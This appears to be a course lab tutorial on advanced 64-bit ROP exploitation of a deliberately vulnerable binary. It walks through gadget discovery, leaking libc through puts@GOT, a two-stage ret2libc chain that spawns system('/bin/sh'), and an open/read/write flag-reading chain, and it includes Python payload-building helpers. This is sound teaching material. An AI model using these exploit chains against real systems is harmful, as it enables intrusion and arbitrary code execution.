Tut06: Advanced ROP

In the last tutorial, we leveraged leaked code and stack pointers in our control hijacking attacks. In this tutorial, we will exploit the same program without any information leak and, most importantly, on x86_64 (64-bit).

Step 0. Understanding the binary

$ checksec ./target
[*] '/home/lab06/tut06-advrop/target'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

DEP (NX) is enabled, so pages not explicitly marked as executable cannot be executed. PIE is not enabled, however, so the target executable's image base is not randomized even under ASLR. Note that the libraries, heap, and stack are still randomized. Fortunately, as in the previous tutorial, there is no stack canary, so we can still smash the stack and hijack the first control transfer.

[Task] Your first task is to trigger a buffer overflow and control rip.

You can control rip with the following payload:

  [buf  ]
  [.....]
  [ra   ] -> func
  [dummy]
  [.....] -> arg?
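A minimal sketch of this layout in Python, using only the standard library. OFFSET_TO_RA is a hypothetical placeholder: the distance from buf to the saved return address is not given here and has to be measured (for example, with a cyclic pattern in gdb). The target 0x400767 is the address of start from the disassembly shown later in this tutorial, used only as an example.

```python
import struct

# Hypothetical placeholder: measure the real distance from buf to the
# saved return address yourself (e.g., with a cyclic pattern in gdb).
OFFSET_TO_RA = 40


def p64(value):
    """Pack an integer as an 8-byte little-endian word."""
    return struct.pack("<Q", value)


def hijack_payload(target, offset=OFFSET_TO_RA):
    """Fill the buffer up to the return address, then overwrite it."""
    return b"A" * offset + p64(target)


payload = hijack_payload(0x400767)  # example target: start()
```

Sending this payload to the program should make it return to the chosen address instead of its original caller, provided the offset is correct.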

Step 1. Controlling arguments in x86_64

However, unlike x86, we cannot control the arguments of the invoked function by overwriting the stack. Since the target binary is built for x86_64, the first argument is passed in rdi instead.

In the last tutorial, we used the pop; ret gadget only to clean up the stack, but it can also be leveraged to control registers. For example, after executing pop rdi; ret, you control the value of a register (rdi = arg1) from the overwritten stack.

Let's control the argument with the following payload:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ]
  [ra   ] -> puts()
  [ra   ]

Since our binary is not PIE-enabled, we can still search for gadgets in its code section.

  1. looking for the pop gadget.
$ ropper --file ./target --search "pop rdi; ret"
...
[INFO] File: ./target
0x00000000004008d3: pop rdi; ret;

What about puts() of the randomized libc?

  2. looking for puts().

Although the actual implementation of puts() is in the libc, we can still invoke puts() by using the resolved address stored in its GOT.

Do you remember how the program invokes an external function via the PLT/GOT? We can invoke puts() the same way, by jumping to its PLT stub:

0x0000000000400600 <puts@plt>:
+--0x400600: jmp    QWORD PTR [rip+0x200a12] # GOT of puts()
|
| (first time)
+->0x400606: push   0x0                    # index of puts()
|  0x40060b: jmp    0x4005f0 <.plt>        # resolve libc's puts()
|
| (once resolved)
+--> puts() @libc

0x0000000000400767 <start>:
   ...
   400776: call   0x400600 <puts@plt>

pwndbg also provides an easy way to look up plt routines in the binary:

pwndbg> plt
0x400600: puts@plt
0x400610: printf@plt
0x400620: memset@plt
0x400630: geteuid@plt
0x400640: read@plt
0x400650: strcmp@plt
0x400660: setreuid@plt
0x400670: setvbuf@plt

[Task] Your next task is to trigger a buffer overflow and print out "Password OK :)"! This is our arbitrary read primitive.

Your payload should look like:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> "Password OK :)"
  [ra   ] -> puts@plt
  [ra   ] (crashing)
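The chain above could be assembled as in the following Python sketch. The gadget and PLT addresses come from the ropper and plt output shown earlier; STR_ADDR is only a placeholder, since the real address of "Password OK :)" is not given in this tutorial and must be located in the binary first.

```python
import struct

POP_RDI_RET = 0x4008d3  # "pop rdi; ret" from the ropper output
PUTS_PLT = 0x400600     # puts@plt from the plt listing


def chain_call1(func, arg1):
    """ROP words for func(arg1): load rdi from the stack, then return into func."""
    words = [POP_RDI_RET, arg1, func]
    return b"".join(struct.pack("<Q", w) for w in words)


# Placeholder only (the image base, NOT the real string address):
# find "Password OK :)" in the binary and substitute its address.
STR_ADDR = 0x400000
chain = chain_call1(PUTS_PLT, STR_ADDR)
```

The resulting bytes go where the saved return address sits, after the padding that fills buf.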

Step 2. Leaking libc's code pointer

Although the process image has lots of interesting functions that we can abuse, it lacks more powerful functions such as system(), which would allow arbitrary command execution. To invoke arbitrary libc functions, we first need to leak a code pointer into the libc image.

Which part of the process image contains libc pointers? The GOT! The code below bridges a call from puts@plt to puts@libc by jumping through the real address of puts() stored in the GOT.

0x0000000000400600 <puts@plt>:
   0x400600: jmp    QWORD PTR [rip+0x200a12] # GOT of puts()

What's the address of puts@GOT? It's rip + 0x200a12, so 0x400606 + 0x200a12 = 0x601018 (rip points to the next instruction, and this jmp is 6 bytes long).
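The same arithmetic, written out as a short Python check. The 6-byte instruction length is the standard encoding of an indirect jmp with a 32-bit rip-relative displacement (ff 25 followed by disp32); the other values are taken from the disassembly above.

```python
JMP_ADDR = 0x400600  # address of the jmp in puts@plt
JMP_LEN = 6          # ff 25 <disp32>: a 6-byte instruction
DISP = 0x200a12      # displacement shown in the disassembly

next_rip = JMP_ADDR + JMP_LEN  # rip already points past the jmp
puts_got = next_rip + DISP

print(hex(next_rip), hex(puts_got))  # 0x400606 0x601018
```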

Again, pwndbg provides a convenient way to look up GOT of the binary as well.

pwndbg> got

GOT protection: Partial RELRO | GOT functions: 10

[0x601018] puts@GLIBC_2.2.5 -> 0x7ffff7a64a30 (puts) ◂— push   r13
[0x601020] printf@GLIBC_2.2.5 -> 0x7ffff7a48f00 (printf) ◂— sub    rsp, 0xd8
...

[Task] Let's leak the address of puts of libc!

Your payload should look like:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> puts@got
  [ra   ] -> puts@plt
  [ra   ] (crashing)

Note that puts() may print fewer than 8 bytes (a 64-bit pointer): it stops at the first NULL byte, and the most significant bytes of a user-space address are zero. It also appends a newline to its output.
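One way to turn the printed bytes back into an address is sketched below in Python. It assumes raw holds exactly what puts() printed for the leak (the non-zero address bytes followed by one newline); the sample bytes encode the puts address from the got listing above and will differ on a randomized run.

```python
def parse_leak(raw):
    """Convert the bytes printed by puts(puts@got) into an integer address."""
    if raw.endswith(b"\n"):
        raw = raw[:-1]  # drop the newline that puts() appends
    if len(raw) > 8:
        raise ValueError("leak is longer than a 64-bit pointer")
    # Restore the zero bytes that puts() did not print.
    return int.from_bytes(raw.ljust(8, b"\x00"), "little")


leak = parse_leak(b"\x30\x4a\xa6\xf7\xff\x7f\n")
print(hex(leak))  # 0x7ffff7a64a30
```

Only the final newline is removed, so an address that happens to contain a 0x0a byte is not truncated.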

Step 3. Preparing Second Payload

Now what? Since we can calculate the base of libc from the leaked address of puts(), can we invoke any function in libc? Perhaps like this:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> puts@got
  [ra   ] -> puts@plt

  [ra   ] -> pop rdi; ret
  [arg1 ] -> "/bin/sh"@libc
  [ra   ] -> system()@libc
  [ra   ] (crashing)

Unfortunately not: when you prepare the payload, you don't yet know the address of libc, because the chain that leaks puts@GOT has not executed yet.

Among all the places we know, is there any place from which we can continue to interact with the process? Yes, the start() function! Our plan is to execute start() again, resolve the address of libc, and smash the stack once more.

[Task] Jump to start() that has the stack overflow. Make sure that you indeed see the program banner once more!

payload1:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> puts@got
  [ra   ] -> puts@plt

  [ra   ] -> start
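payload1 could be built as in this Python sketch. All four addresses appear earlier in this tutorial; OFFSET_TO_RA is again a hypothetical placeholder for the distance from buf to the saved return address, which you need to measure yourself.

```python
import struct

OFFSET_TO_RA = 40        # hypothetical placeholder, measure it yourself
POP_RDI_RET = 0x4008d3   # pop rdi; ret
PUTS_GOT = 0x601018      # GOT slot holding libc's puts address
PUTS_PLT = 0x400600      # puts@plt
START = 0x400767         # start(), the vulnerable function


def flat(*words):
    """Concatenate integers as 8-byte little-endian words."""
    return b"".join(struct.pack("<Q", w) for w in words)


payload1 = b"A" * OFFSET_TO_RA + flat(
    POP_RDI_RET, PUTS_GOT,  # rdi = address of puts@got
    PUTS_PLT,               # puts(puts@got): prints libc's puts address
    START,                  # re-enter start() for a second overflow
)
```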

The program is now executing the vulnerable start() once more, and waiting for your input. It's time to ROP once more to invoke system() with the resolved addresses.

[Task] Invoke system("/bin/sh")!

payload2:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> "/bin/sh"
  [ra   ] -> system@libc
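Resolving the libc addresses for payload2 can be sketched as follows in Python. The offsets in the example call are HYPOTHETICAL values made up for illustration, not taken from any real libc; look up the real offsets of puts, system, and the "/bin/sh" string in the libc the target actually uses.

```python
def rebase(leaked_puts, offsets):
    """Map libc-relative offsets to runtime addresses using the leaked puts."""
    base = leaked_puts - offsets["puts"]
    if base % 0x1000 != 0:
        # A libc image is mapped at a page boundary; anything else
        # suggests a wrong libc version or a mangled leak.
        raise ValueError("libc base is not page-aligned")
    return {name: base + off for name, off in offsets.items()}


# HYPOTHETICAL offsets, for illustration only.
example_offsets = {"puts": 0x64a30, "system": 0x40000, "binsh": 0x180000}
addrs = rebase(0x7ffff7a64a30, example_offsets)
print(hex(addrs["system"]), hex(addrs["binsh"]))
```

The page-alignment check is a cheap sanity test that catches most mistakes before you send the second payload.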

Step 4. Advanced ROP: Chaining multiple functions!

Similar to the last tutorial, we will invoke a sequence of calls to read the flag.

(assume: symlinked anystring -> /proc/flag)

1) open("anystring", 0)
2) read(3, tmp, 1040)
3) write(1, tmp, 1040)

  1. Invoking open()

To control the second argument, we need a gadget that pops rsi (which holds the second argument in x86_64) and returns.

$ ropper --file ./target --search 'pop rsi; ret'
<.. Nop ..>

The target binary doesn't have pop rsi; ret, but it has an effectively identical gadget.

$ ropper --file ./target --search 'pop rsi; pop %; ret'
...
0x00000000004008d1: pop rsi; pop r15; ret;

So invoking open() is pretty doable:

payload2:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> "anystring"

  [ra   ] -> pop rsi; pop r15; ret
  [arg2 ] -> 0
  [dummy] (r15)

  [ra   ] -> open()

  2. Invoking read()

To invoke read(), we need one more gadget to control its third argument: pop rdx; ret. Unfortunately, the target binary doesn't have a proper gadget available.

What should we do? At this point, we know the address of the libc image, so we can extend the ROP chain with libc's gadgets!

$ ropper --file /lib/x86_64-linux-gnu/libc.so.6 --search 'pop rdx; ret'
0x0000000000001b96: pop rdx; ret;
...

Note that ropper reports the gadget's offset within libc, so add the libc base to it. Your payload should look like this:

payload2:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> 3

  [ra   ] -> pop rsi; pop r15; ret
  [arg2 ] -> tmp
  [dummy] (r15)

  [ra   ] -> pop rdx; ret
  [arg3 ] -> 1040

  [ra   ] -> read()
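A Python sketch of this three-argument chain. The two binary gadgets, the libc gadget offset, and read@plt are taken from the output shown in this tutorial; LIBC_BASE and TMP in the example call are hypothetical placeholders for the leaked libc base and for a writable scratch address of your choice.

```python
import struct

POP_RDI_RET = 0x4008d3        # pop rdi; ret (binary)
POP_RSI_R15_RET = 0x4008d1    # pop rsi; pop r15; ret (binary)
POP_RDX_RET_OFFSET = 0x1b96   # pop rdx; ret (offset inside libc)
READ_PLT = 0x400640           # read@plt from the plt listing


def chain_call3(libc_base, func, arg1, arg2, arg3):
    """ROP words for func(arg1, arg2, arg3) using rdi, rsi, and rdx."""
    words = [
        POP_RDI_RET, arg1,
        POP_RSI_R15_RET, arg2, 0,               # 0 is a dummy for r15
        libc_base + POP_RDX_RET_OFFSET, arg3,   # gadget rebased into libc
        func,
    ]
    return b"".join(struct.pack("<Q", w) for w in words)


LIBC_BASE = 0x7ffff7a00000  # hypothetical: use the base from your leak
TMP = 0x601800              # hypothetical: any writable address
chain = chain_call3(LIBC_BASE, READ_PLT, 3, TMP, 1040)
```

The same helper covers open() and write() as well, since setting an unused third argument is harmless.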

[Task] Your final task is to chain open/read/write, and get the real flag from target-seccomp!

What if either PIE or ssp (stack canary) is enabled? Do you think we can exploit this vulnerability?

Tips on handling stack alignment issues

When returning to libc functions in a 64-bit binary through a ROP chain, the program may segfault on a movaps instruction in buffered_vfprintf() or do_system(), as shown in the core dump below:

$ gdb-pwndbg ./target-seccomp core
Reading symbols from ./target-seccomp...
Program terminated with signal SIGSEGV, Segmentation fault.
...
 RBP  0x7ffe05c19d58 —▸ 0x7ffe05c19e68 ◂— 'BBBBBBBB\n'
 RSP  0x7ffe05c17678 —▸ 0x7ffe05c17759 ◂— 0x0
 RIP  0x7f5a4e17c75e ◂— 0x848948502444290f
────────────────────────────────[ DISASM ]─────────────────────────────────
 ► 0x7f5a4e17c75e    movaps xmmword ptr [rsp + 0x50], xmm0
   0x7f5a4e17c763    mov    qword ptr [rsp + 0x108], rax
   0x7f5a4e17c76b    call   0x7f5a4e179490 <0x7f5a4e179490>

This is because some 64-bit libc functions require the stack to be 16-byte aligned when they are called, i.e., the value of $rsp must end with 0. The following shows a violation of this constraint:

*RSP  0x7fffc4cb3bb8 —▸ 0x400767 (start) ◂— push   rbp
*RIP  0x7f6636241140 (read) ◂— lea    rax, [rip + 0x2e0891]
────────────────────────────────[ DISASM ]────────────────────────────────
   0x4008d4       <__libc_csu_init+100>    ret
    ↓
   0x7f6636234d69 <_getopt_internal+89>    pop    rdx
   0x7f6636234d6a <_getopt_internal+90>    pop    rcx
   0x7f6636234d6b <_getopt_internal+91>    pop    rbx
   0x7f6636234d6c <_getopt_internal+92>    ret
    ↓
 ► 0x7f6636241140 <read>                   lea    rax, [rip + 0x2e0891] <0x7f66365219d8>
   0x7f6636241147 <read+7>                 mov    eax, dword ptr [rax]
   0x7f6636241149 <read+9>                 test   eax, eax
   0x7f663624114b <read+11>                jne    read+32 <read+32>

Here, $rsp at the beginning of read is 0x7fffc4cb3bb8, which is not 16-byte aligned. When we continue, the program ends up segfaulting on the aforementioned movaps instruction.

How can we deal with such a situation? More specifically, how can we adjust our data on the stack so that it is aligned?

You can add an extra ret at the beginning of your ROP chain. When ret executes, it increments $rsp by 8 (you already know why!). Thus, a single dummy ret is enough to make $rsp 16-byte aligned. There are many ret instructions in the binary; pick one and add it to your ROP chain. If you already have the address of a pop rdi; ret gadget, you can add 1 to it to get the address of ret (pop rdi is a one-byte instruction).

For example, the payload shown in Step 4 can be revised to:

payload2:

  [buf  ]
  [.....]
  [ra   ] -> ret // dummy return is added to align the stack!
  [ra   ] -> pop rdi; ret // followed by your original rop chain
  [arg1 ] -> 3

  [ra   ] -> pop rsi; pop r15; ret
  [arg2 ] -> tmp
  [dummy] (r15)

  [ra   ] -> pop rdx; ret
  [arg3 ] -> 1040

  [ra   ] -> read()
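The gadget arithmetic and the alignment condition can be checked with a few lines of Python. The two $rsp values are the ones shown in the gdb output in this section; the helper name is only illustrative.

```python
POP_RDI_RET = 0x4008d3
RET = POP_RDI_RET + 1  # skip the one-byte "pop rdi" to land on "ret"


def is_16_byte_aligned(rsp):
    """True when the low four bits of rsp are zero (hex value ends in 0)."""
    return rsp % 16 == 0


print(hex(RET))                            # 0x4008d4
print(is_16_byte_aligned(0x7fffc4cb3bb8))  # False: without the dummy ret
print(is_16_byte_aligned(0x7ffe49f96c60))  # True: with the dummy ret
```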

Verifying in GDB that the dummy ret is added to the ROP chain (right after the end of start):

 ► 0x4007eb <start+132>              ret             <0x4008d4; __libc_csu_init+100>
    ↓
   0x4008d4 <__libc_csu_init+100>    ret // THIS IS THE ADDED RET
    ↓
   0x4008d3 <__libc_csu_init+99>     pop    rdi
   0x4008d4 <__libc_csu_init+100>    ret

As a result, when returning into read, $rsp now ends with 0 (16-byte aligned):

*RSP  0x7ffe49f96c60 —▸ 0x400767 (start) ◂— push   rbp
*RIP  0x7f4bc3bc5140 (read) ◂— lea    rax, [rip + 0x2e0891]
────────────────────────────────[ DISASM ]────────────────────────────────
   0x4008d4       <__libc_csu_init+100>    ret
    ↓
   0x7f4bc3bb8d69 <_getopt_internal+89>    pop    rdx
   0x7f4bc3bb8d6a <_getopt_internal+90>    pop    rcx
   0x7f4bc3bb8d6b <_getopt_internal+91>    pop    rbx
   0x7f4bc3bb8d6c <_getopt_internal+92>    ret
    ↓
 ► 0x7f4bc3bc5140 <read>                   lea    rax, [rip + 0x2e0891] <0x7f4bc3ea59d8>
   0x7f4bc3bc5147 <read+7>                 mov    eax, dword ptr [rax]
   0x7f4bc3bc5149 <read+9>                 test   eax, eax
   0x7f4bc3bc514b <read+11>                jne    read+32 <read+32>
